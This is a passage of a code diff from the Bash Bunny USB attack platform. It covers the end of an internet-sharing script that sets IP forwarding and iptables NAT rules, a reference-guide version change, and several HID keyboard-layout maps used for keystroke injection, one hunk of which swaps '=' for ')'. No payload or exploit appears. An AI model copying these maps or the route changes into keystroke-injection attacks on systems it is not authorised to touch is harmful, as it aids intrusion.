printf "\n Advanced IP settings will be saved for future sessions.\n Default settings may be restored by selecting Advanced IP settings and\n pressing [ENTER] when prompted for IP settings.\n\n Press any key to continue"
|
||||
savechanges
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
function savechanges {
|
||||
# using ";" as a delmiter in sed is a-okay
|
||||
sed -i "s;^sbunnynmask.*;sbunnynmask=$sbunnynmask;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnynet.*;sbunnynet=$sbunnynet;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnylan.*;sbunnylan=$sbunnylan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnywan.*;sbunnywan=$sbunnywan;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnygw.*;sbunnygw=$sbunnygw;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyhostip.*;sbunnyhostip=$sbunnyhostip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sbunnyip.*;sbunnyip=$sbunnyip;" "$BBSH_CONFIG"
|
||||
sed -i "s;^sfirsttime.*;sfirsttime=0;" "$BBSH_CONFIG"
|
||||
sfirsttime=0
|
||||
printf "\n Settings saved.\n"
|
||||
showsettings
|
||||
menu
|
||||
}
|
||||
|
||||
function connectsaved {
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "\n Error: Settings unsaved. Run either Guided or Manual setup first.\n"; menu
|
||||
fi
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Bash Bunny
|
||||
printf "Detecting Bash Bunny..."
|
||||
until ping $sbunnyip -c1 -w1 >/dev/null
|
||||
do
|
||||
printf "."
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up &>/dev/null
|
||||
sleep 1
|
||||
done
|
||||
printf "...found.\n\n"
|
||||
printf " $(tput setaf 6) _ . $(tput sgr0) $(tput setaf 7)___$(tput sgr0) $(tput setaf 3)(\___/)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) ( _ )_ $(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 7)[___]$(tput sgr0) $(tput setaf 2)<-->$(tput sgr0) $(tput setaf 3)(='.'=)$(tput sgr0)\n"
|
||||
printf " $(tput setaf 6) (_ _(_ ,)$(tput sgr0) $(tput setaf 7)\___\\$(tput sgr0) $(tput setaf 3)(\")_(\")$(tput sgr0)\n"
|
||||
ifconfig $sbunnylan $sbunnyhostip netmask $sbunnynmask up #Bring up Ethernet Interface directly connected to Pineapple
|
||||
echo '1' > /proc/sys/net/ipv4/ip_forward # Enable IP Forwarding
|
||||
iptables -I FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT #setup IP forwarding
|
||||
iptables -I FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
|
||||
iptables -I POSTROUTING -t nat -s $sbunnyip -j MASQUERADE
|
||||
route del default #remove default route
|
||||
route add default gw $sbunnygw $sbunnywan #add default gateway
|
||||
printf "\n\n"
|
||||
exit
|
||||
}
|
||||
|
||||
function start_clean {
|
||||
# undo all iptables Bashbunny related rules
|
||||
iptables -D FORWARD -i $sbunnywan -o $sbunnylan -s $sbunnynet -m state --state NEW -j ACCEPT 2>/dev/null
|
||||
iptables -D FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT 2>/dev/null
|
||||
iptables -D POSTROUTING -t nat -s $sbunnyip -j MASQUERADE 2>/dev/null
|
||||
echo '0' > /proc/sys/net/ipv4/ip_forward # Disable forwarding
|
||||
}
|
||||
|
||||
function create_bbsh_config {
|
||||
echo "sbunnynmask=255.255.255.0" > "$BBSH_CONFIG"
|
||||
echo "sbunnynet=172.16.64.0/24" >> "$BBSH_CONFIG"
|
||||
echo "sbunnylan=enx001122334455" >> "$BBSH_CONFIG"
|
||||
echo "sbunnywan=wlo1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnygw=192.168.1.1" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyhostip=172.16.64.64" >> "$BBSH_CONFIG"
|
||||
echo "sbunnyip=172.16.64.1" >> "$BBSH_CONFIG"
|
||||
echo "sfirsttime=1" >> "$BBSH_CONFIG"
|
||||
}
|
||||
|
||||
function bunny {
|
||||
printf "\nNetmask $sbunnynmask\nBunny Net $sbunnynet\nBunny LAN $sbunnylan\nBunny WAN $sbunnywan\nBunny GW $sbunnygw\nBunny IP $sbunnyip\nHost IP $sbunnyhostip\n"
|
||||
printf "\n/)___(\ \n(='.'=)\n(\")_(\")\n"
|
||||
exit
|
||||
}
|
||||
|
||||
banner #remove for less 1337
|
||||
showsettings
|
||||
|
||||
# create bbsh_config if it doesn't exist
|
||||
[ -f "$BBSH_CONFIG" ] || create_bbsh_config
|
||||
source "$BBSH_CONFIG"
|
||||
|
||||
if [[ "$sfirsttime" == "1" ]]; then
|
||||
printf "
|
||||
Since this is the first time running the BB Internet Connection Sharing\n\
|
||||
script, Guided setup is recommended to save initial configuration.\n\
|
||||
Subsequent sessions may be quickly connected using saved settings.\n"
|
||||
fi
|
||||
|
||||
# Removes iptables rules if the script gets a Ctrl-C
|
||||
trap start_clean INT
|
||||
|
||||
menu
|
||||
@@ -6,7 +6,7 @@
|
||||
Bash Bunny by Hak5 USB Attack/Automation Platform
|
||||
|
||||
|
||||
-+- QUICK REFERENCE GUIDE v1.5 -+-
|
||||
-+- QUICK REFERENCE GUIDE v1.4 -+-
|
||||
|
||||
|
||||
+-----------------+
|
||||
@@ -107,8 +107,6 @@
|
||||
$HOST_IP IP Address of the Bash Bunny
|
||||
(Default: 172.16.64.1)
|
||||
$SWITCH_POSITION "switch1", "switch2" or "switch3"
|
||||
$BB_LABEL Volume name of the BashBunny
|
||||
when mounted.
|
||||
|
||||
|
||||
|
||||
@@ -155,8 +153,6 @@
|
||||
GET TARGET_HOSTNAME Returns $TARGET_HOSTNAME
|
||||
GET HOST_IP Returns $HOST_IP
|
||||
GET SWITCH_POSITION Returns $SWITCH_POSITION
|
||||
GET TARGET_OS Returns $TARGET_OS
|
||||
GET BB_LABEL Returns $BB_LABEL
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -165,104 +165,5 @@
|
||||
"\\":"40,00,64",
|
||||
"COMMAND-CTRL-SHIFT":"40,00,64",
|
||||
"COMMAND-CTRL":"40,00,64",
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64",
|
||||
"__comment":"Everything below was additionally added by kuyaya",
|
||||
"GUI-l":"08,00,0f",
|
||||
"RIGHTSHIFT":"20,00,00",
|
||||
"A":"20,00,04",
|
||||
"B":"20,00,05",
|
||||
"C":"20,00,06",
|
||||
"D":"20,00,07",
|
||||
"E":"20,00,08",
|
||||
"F":"20,00,09",
|
||||
"G":"20,00,0a",
|
||||
"H":"20,00,0b",
|
||||
"I":"20,00,0c",
|
||||
"J":"20,00,0d",
|
||||
"K":"20,00,0e",
|
||||
"L":"20,00,0f",
|
||||
"M":"20,00,10",
|
||||
"N":"20,00,11",
|
||||
"O":"20,00,12",
|
||||
"P":"20,00,13",
|
||||
"Q":"20,00,14",
|
||||
"R":"20,00,15",
|
||||
"S":"20,00,16",
|
||||
"T":"20,00,17",
|
||||
"U":"20,00,18",
|
||||
"V":"20,00,19",
|
||||
"W":"20,00,1a",
|
||||
"X":"20,00,1b",
|
||||
"Z":"20,00,1c",
|
||||
"Y":"20,00,1d",
|
||||
"+":"20,00,1e",
|
||||
"\"":"20,00,1f",
|
||||
"*":"20,00,20",
|
||||
"%":"20,00,22",
|
||||
"&":"20,00,23",
|
||||
"/":"20,00,24",
|
||||
"(":"20,00,25",
|
||||
")":"20,00,26",
|
||||
"=":"20,00,27",
|
||||
"?":"20,00,2d",
|
||||
"`":"20,00,2e",
|
||||
"!":"20,00,30",
|
||||
";":"20,00,36",
|
||||
":":"20,00,37",
|
||||
"_":"20,00,38",
|
||||
">":"20,00,64",
|
||||
"°":"02,00,35",
|
||||
"°":"20,00,35",
|
||||
"§":"00,00,35",
|
||||
"ç":"02,00,21",
|
||||
"ç":"20,00,21",
|
||||
"¬":"40,00,23",
|
||||
"¦":"40,00,1e",
|
||||
"¢":"40,00,25",
|
||||
"´":"40,00,2d",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"SHIFT-BACKSPACE":"02,00,2a",
|
||||
"SHIFT-BACKSPACE":"20,00,2a",
|
||||
"€":"40,00,08",
|
||||
"è":"02,00,2f",
|
||||
"è":"20,00,2f",
|
||||
"ü":"00,00,2f",
|
||||
"¨":"00,00,30",
|
||||
"é":"02,00,33",
|
||||
"é":"20,00,33",
|
||||
"ö":"00,00,33",
|
||||
"ä":"00,00,34",
|
||||
"à":"02,00,34",
|
||||
"à":"20,00,34",
|
||||
"£":"02,00,32",
|
||||
"£":"20,00,32",
|
||||
"ALT-GR":"40,00,00",
|
||||
"RIGHTCONTROL":"10,00,00",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"+":"00,00,57",
|
||||
"-":"00,00,56",
|
||||
"*":"00,00,55",
|
||||
"/":"00,00,54",
|
||||
"ENTER":"00,00,58",
|
||||
"DEL":"00,00,63",
|
||||
"INSERT":"00,00,62",
|
||||
"END":"00,00,59",
|
||||
"DOWN":"00,00,5a",
|
||||
"PAGEDOWN":"00,00,5b",
|
||||
"LEFT":"00,00,5c",
|
||||
"RIGHT":"00,00,5e",
|
||||
"HOME":"00,00,5f",
|
||||
"UP":"00,00,60",
|
||||
"PAGEUP":"00,00,61",
|
||||
".":"00,00,63",
|
||||
"0":"00,00,62",
|
||||
"1":"00,00,59",
|
||||
"2":"00,00,5a",
|
||||
"3":"00,00,5b",
|
||||
"4":"00,00,5c",
|
||||
"5":"00,00,5d",
|
||||
"6":"00,00,5e",
|
||||
"7":"00,00,5f",
|
||||
"8":"00,00,60",
|
||||
"9":"00,00,61"
|
||||
}
|
||||
"COMMAND-OPTION-SHIFT'":"40,00,64"
|
||||
}
|
||||
@@ -144,7 +144,7 @@
|
||||
"/":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"=":"02,00,27",
|
||||
")":"02,00,27",
|
||||
"?":"02,00,2d",
|
||||
"¡":"02,00,2e",
|
||||
"¨":"02,00,2f",
|
||||
|
||||
@@ -56,7 +56,6 @@
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"BACKSPACE":"00,00,2a",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
@@ -65,7 +64,6 @@
|
||||
"[":"00,00,2f",
|
||||
"]":"00,00,30",
|
||||
"#":"00,00,31",
|
||||
"__comment":"MIA K42 00,00,32",
|
||||
";":"00,00,33",
|
||||
"'":"00,00,34",
|
||||
"`":"00,00,35",
|
||||
@@ -104,26 +102,10 @@
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"NUMLOCK":"00,00,53",
|
||||
"KPAD_SLASH":"00,00,54",
|
||||
"KPAD_ASTERISK":"00,00,55",
|
||||
"KPAD_MINUS":"00,00,56",
|
||||
"KPAD_PLUS":"00,00,57",
|
||||
"KPAD_ENTER":"00,00,58",
|
||||
"KPAD_1":"00,00,59",
|
||||
"KPAD_2":"00,00,5a",
|
||||
"KPAD_3":"00,00,5b",
|
||||
"KPAD_4":"00,00,5c",
|
||||
"KPAD_5":"00,00,5d",
|
||||
"KPAD_6":"00,00,5e",
|
||||
"KPAD_7":"00,00,5f",
|
||||
"KPAD_8":"00,00,60",
|
||||
"KPAD_9":"00,00,61",
|
||||
"KPAD_0":"00,00,62",
|
||||
"KPAD_DOT":"00,00,63",
|
||||
"\\":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
@@ -155,7 +137,6 @@
|
||||
"Z":"02,00,1d",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"£":"02,00,20",
|
||||
"$":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"^":"02,00,23",
|
||||
@@ -170,26 +151,19 @@
|
||||
"~":"02,00,31",
|
||||
":":"02,00,33",
|
||||
"@":"02,00,34",
|
||||
"¬":"02,00,35",
|
||||
"<":"02,00,36",
|
||||
">":"02,00,37",
|
||||
"?":"02,00,38",
|
||||
"|":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"ALT-TAB":"04,00,2b",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"COMMAND-CTRL":"09,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"0b,00,00",
|
||||
"COMMAND-OPTION":"0c,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"0e,00,00",
|
||||
"ALTGR":"40,00,00",
|
||||
"ALTGR-TAB":"40,00,2b",
|
||||
"¦":"40,00,35",
|
||||
"CTRL-ALTGR":"41,00,00",
|
||||
"ALTGR-SHIFT":"42,00,00"
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00"
|
||||
}
|
||||
@@ -1,187 +0,0 @@
|
||||
{
|
||||
"__comment":"All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment":" ",
|
||||
"__comment":"This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment":" See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment":" of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment":" ",
|
||||
"__comment":"Definition of these 3 bytes can be found",
|
||||
"__comment":" in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment":" of document Device Class Definition for HID Version 1.11",
|
||||
"__comment":" - byte 1: Modifier keys",
|
||||
"__comment":" - byte 2: Reserved",
|
||||
"__comment":" - byte 3: Keycode 1",
|
||||
"__comment":" ",
|
||||
"__comment":"Both documents can be obtained from link here",
|
||||
"__comment":" http://www.usb.org/developers/hidpage/",
|
||||
"__comment":" ",
|
||||
"__comment":" Hungarian QWERTZ language made by Skeleton022",
|
||||
"__comment":" Added áéíóöőúüűÁÉÍÓÖŐÚÜŰ",
|
||||
"a":"00,00,04",
|
||||
"b":"00,00,05",
|
||||
"c":"00,00,06",
|
||||
"d":"00,00,07",
|
||||
"e":"00,00,08",
|
||||
"f":"00,00,09",
|
||||
"g":"00,00,0a",
|
||||
"h":"00,00,0b",
|
||||
"i":"00,00,0c",
|
||||
"j":"00,00,0d",
|
||||
"k":"00,00,0e",
|
||||
"l":"00,00,0f",
|
||||
"m":"00,00,10",
|
||||
"n":"00,00,11",
|
||||
"o":"00,00,12",
|
||||
"p":"00,00,13",
|
||||
"q":"00,00,14",
|
||||
"r":"00,00,15",
|
||||
"s":"00,00,16",
|
||||
"t":"00,00,17",
|
||||
"u":"00,00,18",
|
||||
"v":"00,00,19",
|
||||
"w":"00,00,1a",
|
||||
"x":"00,00,1b",
|
||||
"z":"00,00,1c",
|
||||
"y":"00,00,1d",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
"4":"00,00,21",
|
||||
"5":"00,00,22",
|
||||
"6":"00,00,23",
|
||||
"7":"00,00,24",
|
||||
"8":"00,00,25",
|
||||
"9":"00,00,26",
|
||||
"ö":"00,00,27",
|
||||
"ENTER":"00,00,28",
|
||||
"ESC":"00,00,29",
|
||||
"ESCAPE":"00,00,29",
|
||||
"TAB":"00,00,2b",
|
||||
" ":"00,00,2c",
|
||||
"SPACE":"00,00,2c",
|
||||
"ü":"00,00,2d",
|
||||
"ó":"00,00,2e",
|
||||
"ő":"00,00,2f",
|
||||
"ú":"00,00,30",
|
||||
"ű":"00,00,31",
|
||||
"é":"00,00,33",
|
||||
"á":"00,00,34",
|
||||
"0":"00,00,35",
|
||||
",":"00,00,36",
|
||||
".":"00,00,37",
|
||||
"-":"00,00,38",
|
||||
"CAPSLOCK":"00,00,39",
|
||||
"F1":"00,00,3a",
|
||||
"F2":"00,00,3b",
|
||||
"F3":"00,00,3c",
|
||||
"F4":"00,00,3d",
|
||||
"F5":"00,00,3e",
|
||||
"F6":"00,00,3f",
|
||||
"F7":"00,00,40",
|
||||
"F8":"00,00,41",
|
||||
"F9":"00,00,42",
|
||||
"F10":"00,00,43",
|
||||
"F11":"00,00,44",
|
||||
"F12":"00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK":"00,00,47",
|
||||
"BREAK":"00,00,48",
|
||||
"PAUSE":"00,00,48",
|
||||
"INSERT":"00,00,49",
|
||||
"HOME":"00,00,4a",
|
||||
"PAGEUP":"00,00,4b",
|
||||
"DEL":"00,00,4c",
|
||||
"DELETE":"00,00,4c",
|
||||
"END":"00,00,4d",
|
||||
"PAGEDOWN":"00,00,4e",
|
||||
"RIGHT":"00,00,4f",
|
||||
"RIGHTARROW":"00,00,4f",
|
||||
"LEFT":"00,00,50",
|
||||
"LEFTARROW":"00,00,50",
|
||||
"DOWN":"00,00,51",
|
||||
"DOWNARROW":"00,00,51",
|
||||
"UP":"00,00,52",
|
||||
"UPARROW":"00,00,52",
|
||||
"í":"00,00,64",
|
||||
"APP":"00,00,65",
|
||||
"MENU":"00,00,65",
|
||||
"ALT-TAB":"00,00,71",
|
||||
"CONTROL":"01,00,00",
|
||||
"CTRL":"01,00,00",
|
||||
"SHIFT":"02,00,00",
|
||||
"A":"02,00,04",
|
||||
"B":"02,00,05",
|
||||
"C":"02,00,06",
|
||||
"D":"02,00,07",
|
||||
"E":"02,00,08",
|
||||
"F":"02,00,09",
|
||||
"G":"02,00,0a",
|
||||
"H":"02,00,0b",
|
||||
"I":"02,00,0c",
|
||||
"J":"02,00,0d",
|
||||
"K":"02,00,0e",
|
||||
"L":"02,00,0f",
|
||||
"M":"02,00,10",
|
||||
"N":"02,00,11",
|
||||
"O":"02,00,12",
|
||||
"P":"02,00,13",
|
||||
"Q":"02,00,14",
|
||||
"R":"02,00,15",
|
||||
"S":"02,00,16",
|
||||
"T":"02,00,17",
|
||||
"U":"02,00,18",
|
||||
"V":"02,00,19",
|
||||
"W":"02,00,1a",
|
||||
"X":"02,00,1b",
|
||||
"Z":"02,00,1c",
|
||||
"Y":"02,00,1d",
|
||||
"'":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"+":"02,00,20",
|
||||
"!":"02,00,21",
|
||||
"%":"02,00,22",
|
||||
"/":"02,00,23",
|
||||
"=":"02,00,24",
|
||||
"(":"02,00,25",
|
||||
")":"02,00,26",
|
||||
"Ö":"02,00,27",
|
||||
"Ü":"02,00,2d",
|
||||
"Ó":"02,00,2e",
|
||||
"Ő":"02,00,2f",
|
||||
"Ú":"02,00,30",
|
||||
"Ű":"02,00,31",
|
||||
"É":"02,00,33",
|
||||
"Á":"02,00,34",
|
||||
"?":"02,00,36",
|
||||
":":"02,00,37",
|
||||
"_":"02,00,38",
|
||||
"Í":"02,00,64",
|
||||
"CTRL-SHIFT":"03,00,00",
|
||||
"ALT":"04,00,00",
|
||||
"CTRL-ALT":"05,00,00",
|
||||
"ALT-SHIFT":"06,00,00",
|
||||
"COMMAND":"08,00,00",
|
||||
"GUI":"08,00,00",
|
||||
"WINDOWS":"08,00,00",
|
||||
"COMMAND-OPTION":"12,00,00",
|
||||
"COMMAND-CTRL-SHIFT":"12,00,00",
|
||||
"COMMAND-CTRL":"12,00,00",
|
||||
"COMMAND-OPTION-SHIFT'":"12,00,00",
|
||||
"{":"40,00,05",
|
||||
"&":"40,00,06",
|
||||
"[":"40,00,09",
|
||||
"]":"40,00,0a",
|
||||
"}":"40,00,11",
|
||||
"\\":"40,00,14",
|
||||
"@":"40,00,19",
|
||||
"|":"40,00,1a",
|
||||
"#":"40,00,1b",
|
||||
">":"40,00,1d",
|
||||
"~":"40,00,1e",
|
||||
"^":"40,00,20",
|
||||
"`":"40,00,24",
|
||||
"$":"40,00,33",
|
||||
";":"40,00,36",
|
||||
"*":"40,00,38",
|
||||
"<":"40,00,64"
|
||||
}
|
||||
@@ -1,172 +0,0 @@
|
||||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
|
||||
"e": "00,00,08",
|
||||
"E": "02,00,08",
|
||||
"f": "00,00,09",
|
||||
"F": "02,00,09",
|
||||
"g": "00,00,0a",
|
||||
"G": "02,00,0a",
|
||||
"h": "00,00,0b",
|
||||
"H": "02,00,0b",
|
||||
"i": "00,00,0c",
|
||||
"I": "02,00,0c",
|
||||
"j": "00,00,0d",
|
||||
"J": "02,00,0d",
|
||||
"k": "00,00,0e",
|
||||
"K": "02,00,0e",
|
||||
"l": "00,00,0f",
|
||||
"L": "02,00,0f",
|
||||
"m": "00,00,10",
|
||||
"M": "02,00,10",
|
||||
"n": "00,00,11",
|
||||
"N": "02,00,11",
|
||||
"o": "00,00,12",
|
||||
"O": "02,00,12",
|
||||
"p": "00,00,13",
|
||||
"P": "02,00,13",
|
||||
"q": "00,00,14",
|
||||
"Q": "02,00,14",
|
||||
"r": "00,00,15",
|
||||
"R": "02,00,15",
|
||||
"s": "00,00,16",
|
||||
"S": "02,00,16",
|
||||
"t": "00,00,17",
|
||||
"T": "02,00,17",
|
||||
"u": "00,00,18",
|
||||
"U": "02,00,18",
|
||||
"v": "00,00,19",
|
||||
"V": "02,00,19",
|
||||
"w": "00,00,1a",
|
||||
"W": "02,00,1a",
|
||||
"x": "00,00,1b",
|
||||
"X": "02,00,1b",
|
||||
"y": "00,00,1c",
|
||||
"Y": "02,00,1c",
|
||||
"z": "00,00,1d",
|
||||
"Z": "02,00,1d",
|
||||
"1": "00,00,1e",
|
||||
"!": "02,00,1e",
|
||||
"2": "00,00,1f",
|
||||
"\"": "02,00,1f",
|
||||
"3": "00,00,20",
|
||||
"#": "02,00,20",
|
||||
"4": "00,00,21",
|
||||
"$": "02,00,21",
|
||||
"5": "00,00,22",
|
||||
"%": "02,00,22",
|
||||
"6": "00,00,23",
|
||||
"&": "02,00,23",
|
||||
"7": "00,00,24",
|
||||
"'": "02,00,24",
|
||||
"8": "00,00,25",
|
||||
"(": "02,00,25",
|
||||
"9": "00,00,26",
|
||||
")": "02,00,26",
|
||||
"0": "00,00,27",
|
||||
"ENTER": "00,00,28",
|
||||
"ESC": "00,00,29",
|
||||
"ESCAPE": "00,00,29",
|
||||
"BACKSPACE": "00,00,2a",
|
||||
"TAB": "00,00,2b",
|
||||
"ALT-TAB": "04,00,2b",
|
||||
"SPACE": "00,00,2c",
|
||||
" ": "00,00,2c",
|
||||
"-": "00,00,2d",
|
||||
"=": "02,00,2d",
|
||||
"^": "00,00,2e",
|
||||
"~": "02,00,2e",
|
||||
"@": "00,00,2f",
|
||||
"`": "02,00,2f",
|
||||
"[": "00,00,30",
|
||||
"{": "02,00,30",
|
||||
"\\": "00,00,31",
|
||||
"|": "02,00,31",
|
||||
"]": "00,00,32",
|
||||
"}": "02,00,32",
|
||||
";": "00,00,33",
|
||||
"+": "02,00,33",
|
||||
":": "00,00,34",
|
||||
"*": "02,00,34",
|
||||
",": "00,00,36",
|
||||
"<": "02,00,36",
|
||||
".": "00,00,37",
|
||||
">": "02,00,37",
|
||||
"/": "00,00,38",
|
||||
"?": "02,00,38",
|
||||
"CAPSLOCK": "00,00,39",
|
||||
"F1": "00,00,3a",
|
||||
"F2": "00,00,3b",
|
||||
"F3": "00,00,3c",
|
||||
"F4": "00,00,3d",
|
||||
"F5": "00,00,3e",
|
||||
"F6": "00,00,3f",
|
||||
"F7": "00,00,40",
|
||||
"F8": "00,00,41",
|
||||
"F9": "00,00,42",
|
||||
"F10": "00,00,43",
|
||||
"F11": "00,00,44",
|
||||
"F12": "00,00,45",
|
||||
"PRINTSCREEN":"00,00,46",
|
||||
"SCROLLLOCK": "00,00,47",
|
||||
"PAUSE": "00,00,48",
|
||||
"BREAK": "00,00,48",
|
||||
"INSERT": "00,00,49",
|
||||
"HOME": "00,00,4a",
|
||||
"PAGEUP": "00,00,4b",
|
||||
"DELETE": "00,00,4c",
|
||||
"DEL": "00,00,4c",
|
||||
"END": "00,00,4d",
|
||||
"PAGEDOWN": "00,00,4e",
|
||||
"RIGHTARROW": "00,00,4f",
|
||||
"RIGHT": "00,00,4f",
|
||||
"LEFTARROW": "00,00,50",
|
||||
"LEFT": "00,00,50",
|
||||
"DOWNARROW": "00,00,51",
|
||||
"DOWN": "00,00,51",
|
||||
"UPARROW": "00,00,52",
|
||||
"UP": "00,00,52",
|
||||
"NUMLOCK": "00,00,53",
|
||||
"MENU": "00,00,65",
|
||||
"APP": "00,00,65"
|
||||
}
|
||||
@@ -43,9 +43,6 @@
|
||||
"x":"00,00,1b",
|
||||
"y":"00,00,1c",
|
||||
"z":"00,00,1d",
|
||||
"æ":"00,00,34",
|
||||
"ø":"00,00,33",
|
||||
"å":"00,00,2f",
|
||||
"1":"00,00,1e",
|
||||
"2":"00,00,1f",
|
||||
"3":"00,00,20",
|
||||
@@ -134,9 +131,6 @@
|
||||
"X":"02,00,1b",
|
||||
"Y":"02,00,1c",
|
||||
"Z":"02,00,1d",
|
||||
"Æ":"02,00,34",
|
||||
"Ø":"02,00,33",
|
||||
"Å":"02,00,2f",
|
||||
"!":"02,00,1e",
|
||||
"\"":"02,00,1f",
|
||||
"#":"02,00,20",
|
||||
|
||||
@@ -1,173 +0,0 @@
|
||||
{
|
||||
"__comment": "All numbers here are in hex format and 0x is ignored.",
|
||||
"__comment": " ",
|
||||
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
|
||||
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
|
||||
"__comment": " of document USB HID Usage Tables Version 1.12.",
|
||||
"__comment": " ",
|
||||
"__comment": "Definition of these 3 bytes can be found",
|
||||
"__comment": " in section B.1 Protocol 1 (Keyboard)",
|
||||
"__comment": " of document Device Class Definition for HID Version 1.11",
|
||||
"__comment": " - byte 1: Modifier keys",
|
||||
"__comment": " - byte 2: Reserved",
|
||||
"__comment": " - byte 3: Keycode 1",
|
||||
"__comment": " ",
|
||||
"__comment": "Both documents can be obtained from link here",
|
||||
"__comment": " http://www.usb.org/developers/hidpage/",
|
||||
"__comment": " ",
|
||||
"__comment": "A = LeftShift + a, { = LeftShift + [",
|
||||
"__comment": " ",
|
||||
"CTRL": "01,00,00",
|
||||
"CONTROL": "01,00,00",
|
||||
"SHIFT": "02,00,00",
|
||||
"ALT": "04,00,00",
|
||||
"GUI": "08,00,00",
|
||||
"WINDOWS": "08,00,00",
|
||||
"CTRL-ALT": "05,00,00",
|
||||
"CTRL-SHIFT": "03,00,00",
|
||||
"ALT-SHIFT": "06,00,00",
|
||||
"__comment": "Below 5 key combinations are for Mac OSX",
|
||||
"__comment": "Example: (COMMAND-OPTION SHIFT t) to open terminal",
|
||||
"COMMAND": "08,00,00",
|
||||
"COMMAND-CTRL": "09,00,00",
|
||||
"COMMAND-CTRL-SHIFT": "0B,00,00",
|
||||
"COMMAND-OPTION": "0C,00,00",
|
||||
"COMMAND-OPTION-SHIFT": "0E,00,00",
|
||||
"a": "00,00,04",
|
||||
"A": "02,00,04",
|
||||
"b": "00,00,05",
|
||||
"B": "02,00,05",
|
||||
"c": "00,00,06",
|
||||
"C": "02,00,06",
|
||||
"d": "00,00,07",
|
||||
"D": "02,00,07",
